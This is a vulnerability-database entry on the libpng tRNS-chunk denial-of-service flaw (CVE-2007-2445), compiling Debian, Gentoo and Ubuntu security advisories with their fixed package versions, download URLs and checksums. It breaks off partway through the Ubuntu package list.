ID

VAR-200705-0670


CVE

CVE-2007-2445


TITLE

Libpng Library Remote Denial of Service Vulnerability

Trust: 0.9

sources: BID: 24000 // CNNVD: CNNVD-200705-347

DESCRIPTION

The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. This issue affects libpng-0.90 through libpng-1.2.16. This BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability). CVE-2007-3476 An array indexing error in libgd's GIF handling could induce a denial of service (crash with heap corruption) if exceptionally large color index values are supplied in a maliciously crafted GIF image file. CVE-2007-3477 The imagearc() and imagefilledarc() routines in libgd allow an attacker in control of the parameters used to specify the degrees of arc for those drawing functions to perform a denial of service attack (excessive CPU consumption). CVE-2007-3996 Multiple integer overflows exist in libgd's image resizing and creation routines; these weaknesses allow an attacker in control of the parameters passed to those routines to induce a crash or execute arbitrary code with the privileges of the user running an application or interpreter linked against libgd2. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1750-1 security@debian.org http://www.debian.org/security/ Florian Weimer March 22, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040 Debian Bug : 446308 476669 516256 512665 Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. (CVE-2008-1382) The png_check_keyword might allow context-dependent attackers to set the value of an arbitrary memory location to zero via vectors involving creation of crafted PNG files with keywords. (CVE-2009-0040) For the old stable distribution (etch), these problems have been fixed in version1.2.15~beta5-1+etch2. For the stable distribution (lenny), these problems have been fixed in version 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and CVE-2009-0040 affect the stable distribution.) For the unstable distribution (sid), these problems have been fixed in version 1.2.35-1. We recommend that you upgrade your libpng packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041 Architecture independent packages: http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73 arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce Architecture independent packages: http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b arm architecture (ARM) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05 These files will probably be moved into the stable distribution on its next update. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities Date: December 12, 2014 Bugs: #196865, #335508, #483632, #508322 ID: 201412-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in AMD64 x86 emulation base libraries, the worst of which may allow remote execution of arbitrary code. Background ========== AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-emulation/emul-linux-x86-baselibs < 20140406-r1 >= 20140406-r1 Description =========== Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All users of the AMD64 x86 emulation base libraries should upgrade to the latest version: # emerge --sync # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1" NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them. References ========== [ 1 ] CVE-2007-0720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720 [ 2 ] CVE-2007-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536 [ 3 ] CVE-2007-2026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026 [ 4 ] CVE-2007-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445 [ 5 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 6 ] CVE-2007-3108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108 [ 7 ] CVE-2007-4995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995 [ 8 ] CVE-2007-5116 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116 [ 9 ] CVE-2007-5135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135 [ 10 ] CVE-2007-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266 [ 11 ] CVE-2007-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268 [ 12 ] CVE-2007-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269 [ 13 ] CVE-2007-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849 [ 14 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 15 ] CVE-2013-0338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338 [ 16 ] CVE-2013-0339 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339 [ 17 ] CVE-2013-1664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664 [ 18 ] CVE-2013-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969 [ 19 ] CVE-2013-2877 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877 [ 20 ] CVE-2014-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201412-11.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-472-1 June 11, 2007 libpng vulnerability CVE-2007-2445 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.2 Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.2 Ubuntu 7.04: libpng12-0 1.2.15~beta5-1ubuntu1 After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: It was discovered that libpng did not correctly handle corrupted CRC in grayscale PNG images. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz Size/MD5: 16483 713a6e035fa256e4cb822fb5fc88769b http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc Size/MD5: 652 bc4f3f785816684c54d62947d53bc0db http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb Size/MD5: 846 76eab5d9a96efa186d66cf299a4f6032 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb Size/MD5: 69484 078e25586525c4e83abf08c736fa6bd8 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb Size/MD5: 113888 46fce5d27ac4b2dea9cf4deb633f824e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb Size/MD5: 247528 68879285068cda170eef5a5f56594a1c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb Size/MD5: 66932 12cafbea44a3e7cf109eb24cb47aa557 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb Size/MD5: 111396 3a93335c2a072b2e2c94bc2cc0b3d77e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb Size/MD5: 239662 64029c30dac5152c97e1a0d864c981d0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb Size/MD5: 66304 0cbf98391b6c3219f83cd24cefe0343c http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb Size/MD5: 110828 62c7a8ccc58c86414bcd170c394f8240 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb Size/MD5: 245220 1171c8638ec8ebc2c81f53706885b692 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb Size/MD5: 63824 e66313895e489a36c2f438343fa3e0d4 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb Size/MD5: 108534 73ccb876f761c76b3518b8ca81e80485 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb Size/MD5: 240048 5b19c41bbc639ee717fdacd4d81533e1 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz Size/MD5: 16597 4ff19b636ab120a3fc4cee767171aa4f http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc Size/MD5: 659 5769690df3c57a56d08aa8bf11013a42 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb Size/MD5: 888 44f3267b52e89fc605f350b4fc347e45 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_amd64.udeb Size/MD5: 68992 105702504b783f464dff9ddd48de5ab0 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_amd64.deb Size/MD5: 113542 876f5c1a3a1f6b4bf828edcbabe0702e http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_amd64.deb Size/MD5: 247132 75d920fe60a5d4f356ccb43d8d5a98ed i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_i386.udeb Size/MD5: 69932 53783b0d13fd194f8cc9f19e1edc63d7 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_i386.deb Size/MD5: 114634 1b40abad309e133326ffdce859734610 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_i386.deb Size/MD5: 242882 3dca0a0938a43308465c8987f1357160 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_powerpc.udeb Size/MD5: 67606 088844733b580984e1a3b79001a27511 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb Size/MD5: 112228 6024c0c9d455cfdaa8a38e89d6a53148 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb Size/MD5: 246684 e45d2830ca5bdf0747ea0d436fafc20e sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.2_sparc.udeb Size/MD5: 64656 55d6e7740ec8a9eddcbbfdada56a5f63 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_sparc.deb Size/MD5: 109396 0b522137b1f4b2a34f990efc9dbd81df http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_sparc.deb Size/MD5: 241064 e679e908623c68c5865fbf2c24c46973 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.diff.gz Size/MD5: 14344 16526f313e1ee650074edd742304ec53 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc Size/MD5: 819 b28af76731dfe368e48dfcd554d7b583 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5: 829038 77ca14fcee1f1f4daaaa28123bd0b22d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-1ubuntu1_all.deb Size/MD5: 936 dcec28b3cf4b8ee22c6a1229fdbd2e84 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_amd64.udeb Size/MD5: 70656 b4fa5b37b54fee32dd7404c64b696192 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_amd64.deb Size/MD5: 189594 7e36d8e73bd47dbb19afd7cd0099335a http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_amd64.deb Size/MD5: 179950 c575d8c9699c971ec7682e52e37590b7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb 